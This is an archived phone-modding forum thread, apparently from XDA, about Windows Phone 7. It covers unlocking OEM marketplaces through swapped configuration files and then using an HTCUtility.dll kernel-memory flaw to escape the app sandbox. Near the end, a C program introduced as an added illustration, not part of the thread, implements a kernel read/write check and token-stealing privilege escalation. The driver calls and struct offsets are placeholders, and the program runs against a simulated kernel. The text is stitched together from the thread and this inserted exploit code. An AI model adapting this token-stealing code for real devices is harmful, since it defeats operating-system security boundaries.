If you ask a question that is already answered here, I may facepalm and/or use sarcasm.
DO I NEED TO RUN THIS APP?
No, you don't. It doesn't do anything at all after installing. In fact, I re-used another app that I had handy, so the message you see isn't even accurate!
WHY DOES THE MESSAGE IN THE APP TALK ABOUT INTEROP UNLOCK? CAN I USE THIS APP FOR INTEROP UNLOCK?
It talks about it because I reused an interop-unlock app (which works exactly the same way, but with a different file). This app will not interop-unlock your phone, or even allow you to do so. However, it doesn't need interop-unlock, either. Furthermore, why are you running the app? You don't need to; none of the instructions say to run it.
CAN I DELETE THE APP?
Yes. Once it's installed, you can delete it immediately if you want to.
HOW DO I GET MY OWN OEM'S MARKETPLACE BACK?
You can either install the corresponding XAP and reboot, or you can wait a day or so for the phone to recover on its own.
HOW CAN I GET BACK TO AN OEM MARKETPLACE THAT I ACCESSED BEFORE?
Remove the app (and any variant of it), if it's currently installed. Then, install it again. Then, reboot as before, and you should see the marketplace corresponding to whatever XAP you used.
WHY DON'T ALL APPS WORK?
Many apps will use native drivers to do their work. These drivers are specific to each OEM's firmware, and are baked into the ROM. Apps that don't need special permissions, like the Samsung Now app or LG's Look n Type, should work. Apps that have high permissions or do device-specific things, like a Network Profile app or HTC Sound Enhancer (if it ever appears again) won't work on other phones.
SOME OF THESE APPS HAVE ID_CAP_INTEROPSERVICES, CAN WE USE THEM FOR INTEROP UNLOCK?
No. The apps may appear to work (even on interop-locked phones) because they were installed from the Marketplace and have valid signatures. However, they won't actually be able to do anything useful, because the wrong drivers will be installed (see the previous question).
CAN YOU ADD A XAP FOR ANOTHER MARKETPLACE?
Sure, once the required configuration data is available. This can be tricky - for example, the values for HTC and Samsung are "HTC" and "Samsung", respectively, but the one for LG is actually "LGE" (LG Electronics). I don't know what they are for Toshiba/Fujitsu, and I'm not sure I have everything from Dell, and I don't have any others. Any help here would be appreciated!
CAN I ACCESS MORE THAN ONE OEM MARKETPLACE AT ONCE?
No, sorry. I tried to build support for multiple OEM markets, but it didn't work. The last one overwrites the previous.
WILL APPS KEEP WORKING AFTER THE MARKETPLACE REVERTS?
So far, yes. I don't know whether they'll get updates, although I suspect they will.
CAN SOMETHING BE DONE ABOUT APPS COMPLAINING THEY DON'T WORK ON MY PHONE?
Sadly, no (nothing safe). Most of the LG and Samsung apps that I've tried work just fine (interop aside) on my HTC phone. It helps that in Mango, a lot of formerly interop capabilities (like compass for LG ScanSearch) are now in the official APIs. Some apps will still check though, and there's nothing I can do about that.
CAN WE ACCESS MARKETPLACES FOR OTHER OPERATORS?
It's probably possible, but I haven't bothered to try yet. If there are interesting apps for carriers that work outside of that carrier's network, I'll give it a shot. It's a different file but the structure is very similar.
IS THERE A LIST OF APPS KNOWN TO WORK?
Courtesy of user JusThinK, as of 1 Feb 2012:
JusThinK said:
Converter
FunShot
HTC Hub
Look n Type
MiniDiary
Notes
Now
Photo Enhancer
Photo Studio
Photo Stylist
Photogram
ScanSearch
SmartShare (previously known as Play To - working fine with my Samsung HDTV)
ToolBox
can you just deploy all three and have access to all 3 sources in marketplace?
once you install apps from the other oem sources, and the market reverts back, do you lose the apps you have installed?
No. I tried to build it so you could access multiple OEM marketplaces at once, but it didn't work - only ever used the last one in the config file.
Apps stay installed and runnable even after the marketplace reverts. However, I can't promise they'll receive updates. I think they will, but I haven't been testing this long enough to find out.
Dell's marketplace string is "Dell"
Nokia's marketplace string is "Nokia"
I still haven't figured out Fujitsu's.
thanx dude,
The 3 xap files are working on the HTC Trophy.
But the LG apps that you can download, if you run the downloaded app from the LG place, it says "Only for LG devices."
So are you editing the files in the 'keepers' folder? I had found those some time ago and posted them HERE back in October. I thought they would lead to this since when they were deleted the OEM marketplaces would simply go away, same can be done to remove the carrier marketplaces, but I had trouble getting them off my device to really look at them.
Be warned though in my similar pre-mango hack with the registry we found that changing the OEM marketplace values made the DRM wig out and would prevent any apps from starting. The only way to fix it was a full reset or restore to a point before the modifications were done.
I would guess that if you edit LKG_MOStoreConfig.xml you could do the same thing with carriers.
OEM's:
Samsung
HTC
LGE
Dell
Nokia
MO's:
Att
Tmous
Tmode
I am pretty sure these are case sensitive too so keep that in mind.
Thanks GoodDayToDie
this solution solved my phone not showing OEM apps in the market
Just wondering and perhaps some people might want to test with me if we set LKG_MOStoreConfig.xml and LKG_OEMStoreConfig.xml to read only will it stay set instead of only lasting a few days?
The reason I want this is because I want at&t's stupid marketplace entry to remain GONE, so I edited LKG_MOStoreConfig.xml to this:
Code:
<ConfigurationFile version="1">
<MOStore>
<setting id="MOName"></setting>
<setting id="MOStoreName"></setting>
<setting id="MOStoreID"></setting>
<setting id="MOStoreEnabled">False</setting>
</MOStore>
</ConfigurationFile>
Now I'm just guessing that this is how it should look since like I said before I never could get the original files off my phone to look at them.
@voluptuary: That would probably work (in fact, the "false" alone is probably enough). Marking the file read-only may or may not be sufficient.
@cyclonemon: You're welcome! I didn't even realize people were having that issue but yes, it should help there too.
I am confused, can't I do this already with Milkman's WP7 3MktPlace? I can search/list 3MktPlace apps . I can add new info such as Nokia to the application. It finds and saves the XAP to the PC and from which I can deploy it to the phone.
ok, after reading more carefully, the program process above would require interop unlock, your route doesn't
@voluptuary (again): Thanks for the OEM names. I'm pretty sure I tried "Nokia" and it didn't work, but I'm trying it again (I did the edit on the phone during testing, and that's pretty typo-prone). For what it's worth, they are not case sensitive (a good thing, since the official casing for Samsung is actually SAMSUNG).
EDIT: Confirmation, "Nokia" does not work.
You're exactly right about which file I'm replacing (you can see that if you crack the XAP). I was looking to use the embedded provxml in MOConfig to do interop-unlock, but it looks like the process which reads that file doesn't have the required permissions. I could do something for the MO marketplaces too, but I'm really not sure there's value to it; do the MOs have apps that are useful if you're not a subscriber?
So far, no DRM wig-outs. I'm hoping it works when I don't mess with the registry. We shall see.
@derausgewanderte: This method doesn't use up unsigned app limit (aside from briefly, when the configuration app is installed). It also allows updates from the phone itself.
GoodDayToDie said:
@derausgewanderte: This method doesn't use up unsigned app limit (aside from briefly, when the configuration app is installed). It also allows updates from the phone itself.
I see, thanks for the clarification.
just for your info. Milkman's program works with "Nokia" if that helps.
Thanks, but... neither "Nokia" nor "Dell" are working. It's rather annoying. Samsung I had the actual file to work from, but LG[E] I figured out on my own, and it works. Not so with Nokia or Dell though.
Nokia on the marketplace has the string nokia.
As this seems a nice hack, be very careful with changing the OEM name of your phone. Doing this a couple of times will invalidate something with the DRM and will force you to do a hard reset. You will not be able to run any app installed through the MP otherwise and you will not be able to install anything.
I don't know for sure if the same thing would happen through this method, but I'm not going to try it out. I tried it with editing the registry and if you do that about 5 times, your phone can't do anything without a hard reset.
I'm posting this to avoid problems, not to kill this hack. Because it's definitely good work, but before any complications arise, be warned.
Marvin_S said:
Nokia on the marketplace has the string nokia.
As this seems a nice hack, be very careful with changing the OEM name of your phone. Doing this a couple of times will invalidate something with the DRM and will force you to do a hard reset. You will not be able to run any app installed through the MP otherwise and you will not be able to install anything.
I don't know for sure if the same thing would happen through this method, but I'm not going to try it out. I tried it with editing the registry and if you do that about 5 times, your phone can't do anything without a hard reset.
I'm posting this to avoid problems, not to kill this hack. Because it's definitely good work, but before any complications arise, be warned.
Yes yes please heed this warning. It happened to me.
I'm aware of the problem with the registry editing method. I can't guarantee it won't happen here (make sure you have a recent backup!) but I'm hopeful. I've made far more than 5 changes, and while I haven't had it in this state for weeks yet, I have for days, and so far no problems at all.
EDIT: @VoodooKing: Just to confirm, your problem was with the registry tweak method, right? If you hit that problem with these XAPs, please let me know.
GoodDayToDie said:
@voluptuary (again): Thanks for the OEM names. I'm pretty sure I tried "Nokia" and it didn't work, but I'm trying it again (I did the edit on the phone during testing, and that's pretty typo-prone). For what it's worth, they are not case sensitive (a good thing, since the official casing for Samsung is actually SAMSUNG).
EDIT: Confirmation, "Nokia" does not work.
You're exactly right about which file I'm replacing (you can see that if you crack the XAP). I was looking to use the embedded provxml in MOConfig to do interop-unlock, but it looks like the process which reads that file doesn't have the required permissions. I could do something for the MO marketplaces too, but I'm really not sure there's value to it; do the MOs have apps that are useful if you're not a subscriber?
So far, no DRM wig-outs. I'm hoping it works when I don't mess with the registry. We shall see.
Yeah, I can't get Nokia to work either, however my Lumia 800 never had a "Nokia Marketplace" to begin with on the phone so that may have something to do with it. I think the other programs that have been mentioned are pulling apps in a slightly different way than what actually happens on the phone. I would guess perhaps there is some handset ID matching or something on the phone marketplace whereas with the PC/Web based methods there isn't. (just guessing)
On a side note I tried setting the MOConfig to read only (like I said before) and while att's marketplace still sadly came back, it came back different. It used to be "AT&T AppCenter(tm)", now it reads "AT&T Featured", so that is odd. As for carrier app usefulness, IMHO the at&t ones are garbage but I can't speak to any other carriers.
You have to search for Nokia apps in the marketplace for them to show up. There is no Nokia store.
Yes changing registry a few times caused my phone to not launch apps and install from marketplace. I think I changed the name more than 5 times.

HTCutility.dll used for direct access to TCB chamber

As it is known that HTCUtility.dll will provide complete, unrestricted access to the TCB chamber on HTC devices, can this be used to unlock (at any level) the OS?
I have not heard anyone speaking of it, and it exists on my HTC Arrive. Seems to be a bypass for unrestricted access to anything within HTC devices.
I am looking at it myself, but thought I would share.
See details here...
http://labs.mwrinfosecurity.com/files/Advisories/mwri_htc-htcutility-kernmem_2011-11-10.pdf
Your link is down
very interesting but your link is down so please fix it so I can take a look. I too have an HTC Arrive and have been working on an unlock.
Don't know what happened to the link.
Here is the link to the google docs version.
https://docs.google.com/viewer?a=v&...1C1HkN&sig=AHIEtbTwK-r8RyAyFmt1ai119m7EVAqsNA
-Paul
This looks promising, I'd like to know if what's written there is true ...
The paper is a couple months old, so it *could* have been patched by HTC... but hey, it also might not have been! This bears investigation post-haste.
It's easy enough to use this to execute some arbitrary code at high permissions, which is certainly useful as-is (do things like unrestricted registry and filesystem access). The real potential of it, though, is to turn off the security restrictions for specific apps. Essentially, get the benefits of a "fully unlocked" ROM but on a stock ROM, and only for the apps you specify.
One thing to note here: this is still going to require an interop-unlocked phone. It's opening a handle to a driver, and just like everything else that does so, it needs ID_CAP_INTEROPSERVICES. This is great news for owners of interop-unlocked/unlockable phones (since this makes interop-unlock useful again) but probably doesn't help on 2nd-gen phones or on the Arrive (unless you want to roll back to NoDo, in which case this can probably be used to make an interop-unlock that works on Mango, though it wouldn't be easy).
I hope some one gets this working for the Arrive ASAP
Oh, this was talked about a while back. It was patched back in NoDo.
Really? The paper is from only 3 months ago (assuming USA numeric date style, 2 months otherwise). You don't typically publish security advisories for things that were patched more than 6 months prior.
In any case, HTCUtility.dll still exists on my phone. No idea yet if that IOCTL still works, though. I'll try it out in any case, and report back.
For those asking about it for the Arrive though, you're likely out of luck even if this works. It is *not* a way to interop-unlock a phone, and it is *not* a way around interop-unlock. It's a way to do more things on an interop-unlocked phone. You can't even reach a driver (which is what HTCUtility.dll is) unless your app has ID_CAP_INTEROPSERVICES - that's what the capability is actually for, accessing drivers - and you can't install a homebrew app with that capability unless interop-unlocked (or on pre-Mango).
GoodDayToDie said:
I'll try it out in any case, and report back.
Thank you
GoodDayToDie said:
Really? The paper is from only 3 months ago (assuming USA numeric date style, 2 months otherwise). You don't typically publish security advisories for things that were patched more than 6 months prior.
In any case, HTCUtility.dll still exists on my phone. No idea yet if that IOCTL still works, though. I'll try it out in any case, and report back.
For those asking about it for the Arrive though, you're likely out of luck even if this works. It is *not* a way to interop-unlock a phone, and it is *not* a way around interop-unlock. It's a way to do more things on an interop-unlocked phone. You can't even reach a driver (which is what HTCUtility.dll is) unless your app has ID_CAP_INTEROPSERVICES - that's what the capability is actually for, accessing drivers - and you can't install a homebrew app with that capability unless interop-unlocked (or on pre-Mango).
Yeah I think it was mentioned here on XDA and it was believed to already have been patched.
I think by "patch" they mean that Interop was restricted as of Mango, thereby securing this exploit, in Mango. But for those that are Interop unlocked, this should still grant full access to everything else.
Just my observations. I have an Arrive and am not Interop unlocked yet, so I can't test it.
Looking at the hand-free provisioning to see if I can find a way to leverage that....
-Paul
It works. I successfully opened a handle, read a kernel-mode memory address, modified it, confirmed the modified value, and restored it.
Next trick: finding something really useful to change. Ideally, probably the process security info - if I can simply elevate a given process to full permissions, then I'm golden.
Will share code soon. If somebody knows where I can find the important part of the process info, let me know - I have a little familiarity with NT process context blocks, but none with CE ones (if it even uses such a structure).
GoodDayToDie said:
It works. I successfully opened a handle, read a kernel-mode memory address, modified it, confirmed the modified value, and restored it.
Next trick: finding something really useful to change. Ideally, probably the process security info - if I can simply elevate a given process to full permissions, then I'm golden.
Will share code soon. If somebody knows where I can find the important part of the process info, let me know - I have a little familiarity with NT process context blocks, but none with CE ones (if it even uses such a structure).
All the information looks like it is in the advisory. KDataStruct is what you want. That is equivalent to the PEB in Windows CE.
GoodDayToDie said:
It works. I successfully opened a handle, read a kernel-mode memory address, modified it, confirmed the modified value, and restored it.
Next trick: finding something really useful to change. Ideally, probably the process security info - if I can simply elevate a given process to full permissions, then I'm golden.
Will share code soon. If somebody knows where I can find the important part of the process info, let me know - I have a little familiarity with NT process contet blocks, but none with CE ones (if it even uses such a structure).
Can you confirm this works only on already Interop Unlocked device ?
Thx for your efforts.
Could htclv.dll be helpful in setting security on an app? It supports the following functions:
LVModInitialize, LVModUninitialize, LVModAuthenticateFile, LVModRouting, LVModAuthorize, LVModGetPageHashData, LVModCloseAuthenticationHandle, LVModGetHash, LVModProvisionSecurityForApplication, LVModDeprovisionSecurityForApplication, LVModGetSignerCertificateThumbprint, LVModSetDeveloperUnlockState, LVModAuthorizeVolatileCertificate, LVModGetDeveloperUnlockState
In particular the "Deprovision Security for App" and "Get/set DeveloperUnlock" or maybe "Authorize Volatile Certificate"....
Or maybe htcpl.dll which seems to be the HTC policy engine interface. Supports:
GetFunctionTable, PolicyCloseHandle, PolicyEngineInit, PolicyRuleAbortTransaction, PolicyRuleAddRawData, PolicyRuleBeginTransaction, PolicyRuleBuildRawData, PolicyRuleCommit, PolicyRuleCommitTransaction, PolicyRuleCreate, PolicyRuleDelete, PolicyRuleFindFirst, PolicyRuleFindNext, PolicyRuleGetInfo, PolicyRuleOpen, PolicyRuleParseRawData, PolicyRuleReadRawData
These all look good to modify the security policies on HTC, assuming Interop-Unlocked.
-Paul
@dragonide: Confirmed, this requires interop-unlock since the very first step is opening a handle to a driver.
@Paul_Hammons: The LVMod functions look quite interesting indeed. Where are you getting these functions from (straight out of the DLLs, or some doc somewhere, or decompiled code, or...?), are they user or kernel entry points, and what permissions do they require? The ability to modify app security doesn't do as much good if you already have to be high-privileged to call it, though it might simplify my current goal.
@n0psl3d: Cool, I'll get to work on it.
@n0psl3d: KDataStruct contains kernel information, but I'm pretty sure what I need is in a PROCESS struct (such as is pointed to by pCurPrc). The problem is, I can't find any documentation for that struct. I'm searching online but so far coming up empty. CE doesn't seem to use PEBs or TEBs as I've seen them on NT (not terribly surprising, but annoying).
EDIT: I'm downloading the Embedded CE toolkit, which comes with source code. It'll take a while but hopefully that will have what I need.
OK, digging through the CE source I've found some interesting things. No idea if this will work yet; it'll be exciting just to make it compile.
PROCESS struct -> hTok (handle to a Token) -> phd (PHDATA, pointer to the handle data) -> pvObj (PVOID to the actual object, which is probably a TOKENINFO) -> psi (pointer to ADBI_SECURITY_INFO) -> contains the actual ACLs and privileges, and can be created from an account ID.
Probably the easiest option is to find a relatively high-privilege process and clone its token or some such. Token re-use (if I increment the reference count, this should work) may be easier. Modifying an existing token might also be doable.
Anyhow, I'm not going to have this finished tonight, but it'll get there. For those wondering what you can do with this, it basically breaks you out of the sandbox entirely. You can call any function, access any resource, etc. that is available to a userland process (executing in kernel mode is also possible but trickier). Practically speaking, this makes all the other high-privilege COM DLLs useless - instead of ComFileRW, just use the file IO methods (anywhere you want), instead of DMXMLCOM just call ConfigProvXml directly. Even things like launching native EXEs directly should become possible (run those Opera ports on a stock ROM, for example).
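The following C program is an added illustration of the two steps described in the posts above (the read/modify/confirm/restore check of the kernel read/write primitive, and the PROCESS -> hTok -> PHDATA -> pvObj -> psi walk with token re-use by reference-count bump). It is not code from the thread, from the MWR advisory, or from the CE sources. kread32/kwrite32 are where the HTCUtility.dll driver's kernel-memory IOCTLs would be wrapped; their codes are not reproduced, and for a stand-alone build the two functions operate on a constructed 4 KiB image that stands in for kernel memory. Every struct offset, the handle-to-PHDATA lookup, and the "privilege word" inside psi are placeholder assumptions for this example, not values taken from the CE headers; on a device they have to be recovered from the source the poster mentions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* ---- kernel read/write primitive -----------------------------------------
 * On the device these would wrap the HTCUtility.dll driver's kernel-memory
 * read/write IOCTLs (codes not reproduced here). Stand-alone, they operate on
 * a constructed image that stands in for kernel memory. */
#define KMEM_BASE 0x80000000u
#define KMEM_SIZE 0x1000u
static uint8_t g_kmem[KMEM_SIZE];

static int kaddr_ok(uint32_t addr) {
    return addr >= KMEM_BASE && addr - KMEM_BASE + 4 <= KMEM_SIZE && (addr & 3) == 0;
}
static int kread32(uint32_t addr, uint32_t *out) {
    if (!kaddr_ok(addr)) return 0;
    memcpy(out, g_kmem + (addr - KMEM_BASE), 4);
    return 1;
}
static int kwrite32(uint32_t addr, uint32_t val) {
    if (!kaddr_ok(addr)) return 0;
    memcpy(g_kmem + (addr - KMEM_BASE), &val, 4);
    return 1;
}

/* Read, modify, confirm, restore (the check the poster ran). Returns 1 only
 * if the write was observed and the original value was put back. */
static int selftest_rw(uint32_t addr) {
    uint32_t orig, seen;
    if (!kread32(addr, &orig)) return 0;
    if (!kwrite32(addr, ~orig) || !kread32(addr, &seen) || seen != ~orig) return 0;
    if (!kwrite32(addr, orig) || !kread32(addr, &seen) || seen != orig) return 0;
    return 1;
}

/* ---- hypothetical layout ---------------------------------------------------
 * Offsets, handle encoding and the privilege word are placeholders for this
 * example; real values come from the CE sources, not from this block. */
#define OFF_PROC_HTOK   0x40u   /* PROCESS.hTok                        */
#define OFF_PHD_REFCNT  0x00u   /* PHDATA reference count              */
#define OFF_PHD_PVOBJ   0x04u   /* PHDATA.pvObj -> TOKENINFO            */
#define OFF_TOK_PSI     0x00u   /* TOKENINFO.psi -> ADBI_SECURITY_INFO  */
#define OFF_PSI_PRIV    0x00u   /* constructed privilege word in psi    */
#define HTABLE_BASE     0x80000300u
#define HTABLE_ENTRIES  16u
#define PRIV_SANDBOX    0x00000001u
#define PRIV_FULL       0xFFFFFFFFu

/* Placeholder handle-to-PHDATA lookup: handle >> 2 indexes a table. */
static int handle_to_phd(uint32_t h, uint32_t *phd) {
    uint32_t idx = h >> 2;
    if (idx >= HTABLE_ENTRIES) return 0;
    return kread32(HTABLE_BASE + idx * 4, phd);
}

/* Walk PROCESS -> hTok -> phd -> pvObj -> psi and read the privilege word.
 * Every hop is bounds-checked; a bad pointer aborts instead of reading wild. */
static int process_priv(uint32_t proc, uint32_t *priv) {
    uint32_t htok, phd, tok, psi;
    return kread32(proc + OFF_PROC_HTOK, &htok)
        && handle_to_phd(htok, &phd)
        && kread32(phd + OFF_PHD_PVOBJ, &tok)
        && kread32(tok + OFF_TOK_PSI, &psi)
        && kread32(psi + OFF_PSI_PRIV, priv);
}

/* Token re-use: bump the donor token's refcount so it outlives the donor,
 * then point the target PROCESS at the donor's token handle. */
static int steal_token(uint32_t target, uint32_t donor) {
    uint32_t htok, phd, refs;
    if (!kread32(donor + OFF_PROC_HTOK, &htok) || !handle_to_phd(htok, &phd)) return 0;
    if (!kread32(phd + OFF_PHD_REFCNT, &refs) || !kwrite32(phd + OFF_PHD_REFCNT, refs + 1)) return 0;
    return kwrite32(target + OFF_PROC_HTOK, htok);
}

/* Constructed image: a sandboxed app process and a fully privileged donor. */
#define PROC_APP   0x80000100u
#define PROC_DONOR 0x80000200u
static void build_fake_kernel(void) {
    memset(g_kmem, 0, sizeof g_kmem);
    kwrite32(PROC_APP   + OFF_PROC_HTOK, 0x04);            /* handle index 1 */
    kwrite32(PROC_DONOR + OFF_PROC_HTOK, 0x08);            /* handle index 2 */
    kwrite32(HTABLE_BASE + 1 * 4, 0x80000400u);            /* app token PHDATA */
    kwrite32(HTABLE_BASE + 2 * 4, 0x80000440u);            /* donor token PHDATA */
    kwrite32(0x80000400u + OFF_PHD_REFCNT, 1); kwrite32(0x80000400u + OFF_PHD_PVOBJ, 0x80000500u);
    kwrite32(0x80000440u + OFF_PHD_REFCNT, 1); kwrite32(0x80000440u + OFF_PHD_PVOBJ, 0x80000540u);
    kwrite32(0x80000500u + OFF_TOK_PSI, 0x80000600u);
    kwrite32(0x80000540u + OFF_TOK_PSI, 0x80000640u);
    kwrite32(0x80000600u + OFF_PSI_PRIV, PRIV_SANDBOX);
    kwrite32(0x80000640u + OFF_PSI_PRIV, PRIV_FULL);
}

int main(void) {
    uint32_t before = 0, after = 0, refs = 0;
    build_fake_kernel();
    printf("rw selftest: %s\n", selftest_rw(PROC_APP + OFF_PROC_HTOK) ? "ok" : "FAILED");
    process_priv(PROC_APP, &before);
    steal_token(PROC_APP, PROC_DONOR);
    process_priv(PROC_APP, &after);
    kread32(0x80000440u + OFF_PHD_REFCNT, &refs);
    printf("app priv before=0x%08x after=0x%08x donor token refs=%u\n",
           (unsigned)before, (unsigned)after, (unsigned)refs);
    return after == PRIV_FULL ? 0 : 1;
}
```

The point of the bounds checks is the caveat the thread keeps circling: with an arbitrary kernel write, one wrong offset corrupts a live structure rather than returning an error, so every hop is validated and nothing is written until every read in the chain has succeeded.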
I'm sorry, I still don't know what any of that means. But it sounds good! I wish I knew how to do this kind of stuff. Thanks for all of your work!